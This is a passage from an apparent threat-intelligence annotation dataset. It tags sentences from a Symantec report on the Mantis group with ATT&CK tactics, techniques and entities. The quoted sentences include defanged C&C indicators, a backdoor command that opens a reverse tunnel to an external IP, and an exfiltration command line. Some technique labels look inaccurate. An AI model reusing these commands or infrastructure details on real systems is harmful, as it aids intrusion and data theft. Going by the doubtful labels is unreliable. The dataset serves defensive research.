a00fed53b1ece4610c8b52934c20af3667d455f092a77f8d9bc46fdb9047e41a", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s162-6dc1e3", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 162, "context_before": "| TABLEFLIP sample SHA256 | a00fed53b1ece4610c8b52934c20af3667d455f092a77f8d9bc46fdb9047e41a", "sentence_text": "| CASTLETAP sample SHA256 | eb6af99148f0ce5b58e414162ff2b7567b4cf08953862a088996365ff306014b", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s163-b08a46", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 163, "context_before": "| CASTLETAP sample SHA256 | eb6af99148f0ce5b58e414162ff2b7567b4cf08953862a088996365ff306014b", "sentence_text": "| REPTILE variant sample SHA256 | 33c22b2db8c0948c67204485972d2eb856e13dca16132371337fc3534e3df16d | /bin/support sample SHA256", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s164-5cd7e1", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 164, "context_before": "| REPTILE variant sample SHA256 | 33c22b2db8c0948c67204485972d2eb856e13dca16132371337fc3534e3df16d | /bin/support sample SHA256", "sentence_text": "| abefe121e5c895bf63be80152ccbe2d7bb5ad985aa3ab989bcb7c0804b90d004 | THINCRUST sample SHA256 | 2266667af7532a32b9c21c330a9fe56356ca66610e39654804a7262f2af61017 |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s165-12bb16", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 165, "context_before": "| abefe121e5c895bf63be80152ccbe2d7bb5ad985aa3ab989bcb7c0804b90d004 | THINCRUST sample SHA256 | 2266667af7532a32b9c21c330a9fe56356ca66610e39654804a7262f2af61017 |", "sentence_text": "THINCRUST sample SHA256 | 4e4c5e5ca588bd84b67a37b654ec522768fa83e535ff795a5c196da8f8b9737d", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s166-06f635", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 166, "context_before": "THINCRUST sample SHA256 | 4e4c5e5ca588bd84b67a37b654ec522768fa83e535ff795a5c196da8f8b9737d", "sentence_text": "| Related to THINCRUST", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s1-82551d", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Mantis: New Tooling Used in Attacks Against Palestinian Targets | Symantec Enterprise Blogs 13 captures 04 Apr 2023 - 27 Nov 2024 success fail About this capture COLLECTED BY Collection:\nSave Page", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s2-e5ad35", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "Mantis: New Tooling Used in Attacks Against Palestinian Targets | Symantec Enterprise Blogs 13 captures 04 Apr 2023 - 27 Nov 2024 success fail About this capture COLLECTED BY Collection:\nSave Page", "sentence_text": "Now Outlinks TIMESTAMPS The Wayback Machine - https://web.archive.org/web/20231227054130/https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks Threat Hunter Team Symantec The Mantis cyber-espionage group (aka Arid Viper, Desert Falcon, APT-C-23), a threat actor believed to be operating out of the Palestinian territories , is continuing to mount attacks, deploying a refreshed toolset and going to great lengths to maintain a persistent presence on targeted networks.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Mounts attacks, deploys refreshed toolset, and maintains persistent presence", "entities": [ { "text": "Arid Viper", "start": 255, "end": 265, "label": "ThreatActor" }, { "text": "Desert Falcon", "start": 267, "end": 280, "label": "ThreatActor" }, { "text": "APT-C-23", "start": 282, "end": 290, "label": "ThreatActor" }, { "text": "Mantis ", "start": 221, "end": 228, "label": "ThreatActor" }, { "text": "refreshed toolset", "start": 414, "end": 431, "label": "MalwareTool" }, { "text": " Palestinian territories", "start": 343, "end": 367, "label": "Infrastructure_Indicator" }, { "text": "mount attacks", "start": 387, "end": 400, "label": "Action" }, { "text": "deploying ", "start": 402, "end": 412, "label": "Action" }, { "text": " maintain a persistent presence", "start": 461, "end": 492, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s3-41d11a", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "Now Outlinks TIMESTAMPS The Wayback Machine - https://web.archive.org/web/20231227054130/https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks Threat Hunter Team Symantec The Mantis cyber-espionage group (aka Arid Viper, Desert Falcon, APT-C-23), a threat actor believed to be operating out of the Palestinian territories , is continuing to mount attacks, deploying a refreshed toolset and going to great lengths to maintain a persistent presence on targeted networks.", "sentence_text": "This targeting is not unprecedented for Mantis and Symantec previously uncovered attacks against individuals located in the Palestinian territories during 2017.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s4-46830d", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "This targeting is not unprecedented for Mantis and Symantec previously uncovered attacks against individuals located in the Palestinian territories during 2017.", "sentence_text": "Background\nMantis has been active since at least 2014, with some third-party reporting suggesting it may have been active as early as 2011.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s5-c62625", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "Background\nMantis has been active since at least 2014, with some third-party reporting suggesting it may have been active as early as 2011.", "sentence_text": "The group is known to target organizations in Israel and a number of other Middle Eastern countries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s6-96c92f", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "The group is known to target organizations in Israel and a number of other Middle Eastern countries.", "sentence_text": "The group is known for employing spear-phishing emails and fake social media profiles to lure targets into installing malware on their devices.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1204", "name": "User Execution" } ], "procedure": "The group uses spear-phishing emails and fake social media profiles to trick users into installing malware on their devices.", "entities": [ { "text": "employing spear-phishing emails", "label": "Action", "start": 23, "end": 54 }, { "text": "fake social media profiles", "label": "Infrastructure_Indicator", "start": 59, "end": 85 }, { "text": "installing malware on their devices", "label": "Action", "start": 107, "end": 142 } ] }, { "uid": "mitre-81_mitre_report-p1-s7-a9fd8f", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "The group is known for employing spear-phishing emails and fake social media profiles to lure targets into installing malware on their devices.", "sentence_text": "Mantis is widely accepted to be linked to the Palestinian territories.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s8-ae673d", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "Mantis is widely accepted to be linked to the Palestinian territories.", "sentence_text": "While other vendors have linked the group to Hamas , Symantec cannot make a definitive attribution to any Palestinian organization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s9-02bde4", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "While other vendors have linked the group to Hamas , Symantec cannot make a definitive attribution to any Palestinian organization.", "sentence_text": "In its most recent attacks, the group used updated versions of its custom Micropsia and Arid Gopher backdoors to compromise targets before engaging in extensive credential theft and exfiltration of stolen data.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1110", "name": "Brute Force" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Used updated backdoors to compromise targets, steal credentials, and exfiltrate data", "entities": [ { "text": " Arid Gopher", "start": 87, "end": 99, "label": "MalwareTool" }, { "text": "Micropsia ", "start": 74, "end": 84, "label": "MalwareTool" }, { "text": "used ", "start": 38, "end": 43, "label": "Action" }, { "text": "compromise ", "start": 113, "end": 124, "label": "Action" }, { "text": "credential theft", "start": 161, "end": 177, "label": "Action" }, { "text": "exfiltration ", "start": 182, "end": 195, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s10-74560d", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "In its most recent attacks, the group used updated versions of its custom Micropsia and Arid Gopher backdoors to compromise targets before engaging in extensive credential theft and exfiltration of stolen data.", "sentence_text": "Attack chain\nThe initial infection vector for this campaign remains unknown.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s11-2f199e", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "Attack chain\nThe initial infection vector for this campaign remains unknown.", "sentence_text": "In one organization targeted, a feature of the compromise was that the attackers deployed three distinct versions of the same toolset (i.e. different variants of the same tools) on three groups of computers.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deploys three distinct variants of the same toolset across multiple groups of computers.", "entities": [ { "text": "attackers", "start": 71, "end": 80, "label": "ThreatActor" }, { "text": "deployed three distinct versions of the same toolset", "start": 81, "end": 133, "label": "Action" }, { "text": "toolset", "start": 126, "end": 133, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s12-201867", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "In one organization targeted, a feature of the compromise was that the attackers deployed three distinct versions of the same toolset (i.e. different variants of the same tools) on three groups of computers.", "sentence_text": "Compartmentalizing the attack in this fashion was likely a precautionary measure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s13-987d83", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "Compartmentalizing the attack in this fashion was likely a precautionary measure.", "sentence_text": "If one toolset was discovered, the attackers would still have a persistent presence on the target’s network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s14-8d7204", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "If one toolset was discovered, the attackers would still have a persistent presence on the target’s network.", "sentence_text": "The following is a description of how one of those three toolsets was used:\nThe first evidence of malicious activity occurred on December 18, 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s15-7f41e2", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "The following is a description of how one of those three toolsets was used:\nThe first evidence of malicious activity occurred on December 18, 2022.", "sentence_text": "Three distinct sets of obfuscated PowerShell commands were executed to load a Base64-encoded string, which started embedded shellcode.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Executed obfuscated PowerShell to load Base64-encoded shellcode", "entities": [ { "text": "executed ", "start": 59, "end": 68, "label": "Action" }, { "text": "load ", "start": 71, "end": 76, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s16-86f4b4", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "Three distinct sets of obfuscated PowerShell commands were executed to load a Base64-encoded string, which started embedded shellcode.", "sentence_text": "The shellcode was a 32-bit stager that downloaded another stage using basic TCP-based protocol from a command-and-control (C&C) server: 104.194.222[.]50 port 4444.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Downloaded next stage from C&C server via TCP", "entities": [ { "text": " (C&C) server: 104.194.222[.]50 port 4444", "start": 121, "end": 162, "label": "Infrastructure_Indicator" }, { "text": "shellcode ", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "downloaded ", "start": 39, "end": 50, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s17-2b2291", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "The shellcode was a 32-bit stager that downloaded another stage using basic TCP-based protocol from a command-and-control (C&C) server: 104.194.222[.]50 port 4444.", "sentence_text": "The attackers returned on December 19 to dump credentials before downloading the Micropsia backdoor and Putty, a publicly available SSH client , using Certutil and BITSAdmin Micropsia subsequently executed and initiated contact with a C&C server.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" }, { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Dumped credentials, downloaded Micropsia and Putty, then executed backdoor and contacted C&C", "entities": [ { "text": "Putty", "start": 104, "end": 109, "label": "MalwareTool" }, { "text": "Micropsia ", "start": 81, "end": 91, "label": "MalwareTool" }, { "text": "BITSAdmin ", "start": 164, "end": 174, "label": "MalwareTool" }, { "text": "Micropsia ", "start": 174, "end": 184, "label": "MalwareTool" }, { "text": "Certutil ", "start": 151, "end": 160, "label": "MalwareTool" }, { "text": "C&C server", "start": 235, "end": 245, "label": "Infrastructure_Indicator" }, { "text": "dump credentials", "start": 41, "end": 57, "label": "Action" }, { "text": "initiated contact", "start": 210, "end": 227, "label": "Action" }, { "text": "executed ", "start": 197, "end": 206, "label": "Action" }, { "text": "downloading ", "start": 65, "end": 77, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s18-7a197f", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "The attackers returned on December 19 to dump credentials before downloading the Micropsia backdoor and Putty, a publicly available SSH client , using Certutil and BITSAdmin Micropsia subsequently executed and initiated contact with a C&C server.", "sentence_text": "On the same day, Micropsia also executed on three other machines in the same organization.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" }, { "id": "T1053", "name": "Scheduled Task/Job" } ], "procedure": "Executed Micropsia on three additional machines", "entities": [ { "text": "Micropsia ", "start": 17, "end": 27, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s19-7460ff", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "On the same day, Micropsia also executed on three other machines in the same organization.", "sentence_text": "In each case, it ran in a folder named after its file name:\ncsidl_common_appdata\\systempropertiesinternationaltime\\systempropertiesinternationaltime.exe\ncsidl_common_appdata\\windowsnetworkmanager\\windowsnetworkmanager.exe\ncsidl_common_appdata\\windowsps\\windowsps.exe", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Ran in folders named after file names", "entities": [ { "text": "csidl_common_appdata\\systempropertiesinternationaltime\\systempropertiesinternationaltime.exe", "start": 60, "end": 152, "label": "Infrastructure_Indicator" }, { "text": "csidl_common_appdata\\windowsnetworkmanager\\windowsnetworkmanager.exe", "start": 153, "end": 221, "label": "Infrastructure_Indicator" }, { "text": "csidl_common_appdata\\windowsps\\windowsps.exe", "start": 222, "end": 266, "label": "Infrastructure_Indicator" }, { "text": "ran ", "start": 17, "end": 21, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s20-6fcdc1", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "In each case, it ran in a folder named after its file name:\ncsidl_common_appdata\\systempropertiesinternationaltime\\systempropertiesinternationaltime.exe\ncsidl_common_appdata\\windowsnetworkmanager\\windowsnetworkmanager.exe\ncsidl_common_appdata\\windowsps\\windowsps.exe", "sentence_text": "On one computer, Micropsia was used to set up a reverse socks tunnel to an external IP address:\nCSIDL_COMMON_APPDATA\\windowsservicemanageav\\windowsservicemanageav.exe -connect 104.194.222[.]50:443", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Set up reverse socks tunnel to external IP address using Micropsia", "entities": [ { "text": "Micropsia ", "start": 17, "end": 27, "label": "MalwareTool" }, { "text": "CSIDL_COMMON_APPDATA\\windowsservicemanageav\\windowsservicemanageav.exe", "start": 96, "end": 166, "label": "Infrastructure_Indicator" }, { "text": "104.194.222[.]50:443", "start": 176, "end": 196, "label": "Infrastructure_Indicator" }, { "text": "set up ", "start": 39, "end": 46, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s21-87ad54", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "On one computer, Micropsia was used to set up a reverse socks tunnel to an external IP address:\nCSIDL_COMMON_APPDATA\\windowsservicemanageav\\windowsservicemanageav.exe -connect 104.194.222[.]50:443", "sentence_text": "[REDACTED]\nOn December 20, Micropsia was used to run an unknown executable named windowspackages.exe on one of the infected computers.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Ran windowspackages.exe using Micropsia", "entities": [ { "text": "Micropsia ", "start": 27, "end": 37, "label": "MalwareTool" }, { "text": " windowspackages.exe", "start": 80, "end": 100, "label": "Infrastructure_Indicator" }, { "text": "run ", "start": 49, "end": 53, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s22-594c25", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "[REDACTED]\nOn December 20, Micropsia was used to run an unknown executable named windowspackages.exe on one of the infected computers.", "sentence_text": "The following day, December 21, RAR was executed to archive files on another infected computer.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1560", "name": "Archive Collected Data" } ], "procedure": "Executed RAR to archive files on infected computer", "entities": [ { "text": "RAR ", "start": 32, "end": 36, "label": "Infrastructure_Indicator" }, { "text": "executed ", "start": 40, "end": 49, "label": "Action" }, { "text": "archive ", "start": 52, "end": 60, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s23-fb23f9", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "The following day, December 21, RAR was executed to archive files on another infected computer.", "sentence_text": "Arid Gopher was in turn used to run a tool called SetRegRunKey.exe that provided persistence by adding Arid Gopher to the registry so that it executed on reboot.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "Used SetRegRunKey.exe to add Arid Gopher to registry for persistence", "entities": [ { "text": "Arid Gopher ", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "SetRegRunKey.exe", "start": 50, "end": 66, "label": "MalwareTool" }, { "text": "Arid Gopher", "start": 103, "end": 114, "label": "MalwareTool" }, { "text": "executed ", "start": 142, "end": 151, "label": "Action" }, { "text": "run ", "start": 32, "end": 36, "label": "Action" }, { "text": "adding ", "start": 96, "end": 103, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s24-193e19", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "Arid Gopher was in turn used to run a tool called SetRegRunKey.exe that provided persistence by adding Arid Gopher to the registry so that it executed on reboot.", "sentence_text": "It also ran an unknown file named localsecuritypolicy.exe (this file name was used for the Arid Gopher backdoor elsewhere by the attackers).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Ran localsecuritypolicy.exe using Arid Gopher", "entities": [ { "text": "localsecuritypolicy.exe", "start": 34, "end": 57, "label": "Infrastructure_Indicator" }, { "text": "Arid Gopher", "start": 91, "end": 102, "label": "MalwareTool" }, { "text": "ran ", "start": 8, "end": 12, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s25-525846", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "It also ran an unknown file named localsecuritypolicy.exe (this file name was used for the Arid Gopher backdoor elsewhere by the attackers).", "sentence_text": "On December 28, Micropsia was used to run windowspackages.exe on three more infected computers.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "run windowspackages.exe on three more infected computers using Micropsia", "entities": [ { "text": "Micropsia", "start": 16, "end": 25, "label": "MalwareTool" }, { "text": "windowspackages.exe", "start": 42, "end": 61, "label": "MalwareTool" }, { "text": "run windowspackages.exe on three more infected computers", "start": 38, "end": 94, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s26-ba031c", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "On December 28, Micropsia was used to run windowspackages.exe on three more infected computers.", "sentence_text": "On December 31, Arid Gopher executed two unknown files named networkswitcherdatamodell.exe and networkuefidiagsbootserver.exe on two of the infected computers.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Executed two unknown files using Arid Gopher", "entities": [ { "text": "networkswitcherdatamodell.exe", "start": 61, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "networkuefidiagsbootserver.exe ", "start": 95, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "executed ", "start": 28, "end": 37, "label": "Action" }, { "text": " Arid Gopher", "start": 15, "end": 27, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s27-5c2cd2", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "On December 31, Arid Gopher executed two unknown files named networkswitcherdatamodell.exe and networkuefidiagsbootserver.exe on two of the infected computers.", "sentence_text": "On January 2, the attackers retired the version of Arid Gopher they were using and introduced a new variant.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Retired old Arid Gopher variant and introduced new variant", "entities": [ { "text": "Arid Gopher ", "start": 51, "end": 63, "label": "MalwareTool" }, { "text": "retired ", "start": 28, "end": 36, "label": "Action" }, { "text": "using ", "start": 73, "end": 79, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s28-4eda1c", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "On January 2, the attackers retired the version of Arid Gopher they were using and introduced a new variant.", "sentence_text": "Whether this was because the first version was discovered or whether it was standard operating procedure is unclear.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s29-42b68b", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "Whether this was because the first version was discovered or whether it was standard operating procedure is unclear.", "sentence_text": "On January 4, Micropsia was used to execute two unknown files, both named hostupbroker.exe, on a single computer from the folder: csidl_common_appdata\\hostupbroker\\hostupbroker.exe.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "Use Micropsia to execute two unknown files named hostupbroker.exe.", "entities": [ { "text": "Micropsia", "start": 14, "end": 23, "label": "MalwareTool" }, { "text": "execute two unknown files, both named hostupbroker.exe", "start": 36, "end": 90, "label": "Action" }, { "text": "hostupbroker.exe", "start": 74, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "csidl_common_appdata\\hostupbroker\\hostupbroker.exe", "start": 130, "end": 180, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-81_mitre_report-p1-s30-9376b2", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "On January 4, Micropsia was used to execute two unknown files, both named hostupbroker.exe, on a single computer from the folder: csidl_common_appdata\\hostupbroker\\hostupbroker.exe.", "sentence_text": "This was immediately followed by the exfiltration of a RAR file:\nCSIDL_COMMON_APPDATA\\windowsupserv\\windowsupserv.exe -f CSIDL_COMMON_APPDATA\\windowspackages\\01-04-2023-15-13-39_getf.rar On January 9, Arid Gopher was used to execute two unknown files on a single computer:", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567", "name": "Exfiltration Over Web Service" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Exfiltrated RAR file and executed unknown files using Arid Gopher", "entities": [ { "text": "CSIDL_COMMON_APPDATA\\windowsupserv\\windowsupserv.exe", "start": 65, "end": 117, "label": "Infrastructure_Indicator" }, { "text": "CSIDL_COMMON_APPDATA\\windowspackages\\01-04-2023-15-13-39_getf.rar ", "start": 121, "end": 187, "label": "Infrastructure_Indicator" }, { "text": "execute ", "start": 225, "end": 233, "label": "Action" }, { "text": "exfiltration ", "start": 37, "end": 50, "label": "Action" }, { "text": "Arid Gopher ", "start": 201, "end": 213, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s31-01c7cc", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "This was immediately followed by the exfiltration of a RAR file:\nCSIDL_COMMON_APPDATA\\windowsupserv\\windowsupserv.exe -f CSIDL_COMMON_APPDATA\\windowspackages\\01-04-2023-15-13-39_getf.rar On January 9, Arid Gopher was used to execute two unknown files on a single computer:", "sentence_text": "csidl_common_appdata\\teamviewrremoteservice\\teamviewrremoteservice.exe\ncsidl_common_appdata\\embededmodeservice\\embededmodeservice.exe\nThe last malicious activity occurred from January 12 onwards when Arid Gopher was used to execute the unknown file named localsecuritypolicy.exe every ten hours.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1053", "name": "Scheduled Task/Job" } ], "procedure": "Executed localsecuritypolicy.exe every ten hours using Arid Gopher", "entities": [ { "text": "csidl_common_appdata\\teamviewrremoteservice\\teamviewrremoteservice.exe", "start": 0, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "csidl_common_appdata\\embededmodeservice\\embededmodeservice.exe", "start": 71, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "Arid Gopher ", "start": 200, "end": 212, "label": "MalwareTool" }, { "text": "localsecuritypolicy.exe", "start": 255, "end": 278, "label": "Infrastructure_Indicator" }, { "text": "execute ", "start": 224, "end": 232, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s32-25f3ea", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "csidl_common_appdata\\teamviewrremoteservice\\teamviewrremoteservice.exe\ncsidl_common_appdata\\embededmodeservice\\embededmodeservice.exe\nThe last malicious activity occurred from January 12 onwards when Arid Gopher was used to execute the unknown file named localsecuritypolicy.exe every ten hours.", "sentence_text": "Micropsia\nVariants of the Micropsia backdoor used in these attacks appear to be slightly updated versions of those seen by other vendors.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Updated versions of Micropsia backdoor used in attacks", "entities": [ { "text": "Micropsia", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "Micropsia backdoor ", "start": 26, "end": 45, "label": "MalwareTool" }, { "text": "updated ", "start": 89, "end": 97, "label": "Action" } ] }, { "uid": "mitre-81_mitre_report-p1-s33-149718", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "Micropsia\nVariants of the Micropsia backdoor used in these attacks appear to be slightly updated versions of those seen by other vendors.", "sentence_text": "In this campaign, Micropsia was deployed using multiple file names and file paths:\ncsidl_common_appdata\\microsoft\\dotnet35\\microsoftdotnet35.exe", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Deployed using multiple file names and paths", "entities": [ { "text": "Micropsia ", "start": 18, "end": 28, "label": "MalwareTool" }, { "text": "deployed ", "start": 32, "end": 41, "label": "Action" }, { "text": "csidl_common_appdata\\microsoft\\dotnet35\\microsoftdotnet35.exe", "start": 83, "end": 144, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-81_mitre_report-p1-s34-033924", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "In this campaign, Micropsia was deployed using multiple file names and file paths:\ncsidl_common_appdata\\microsoft\\dotnet35\\microsoftdotnet35.exe", "sentence_text": 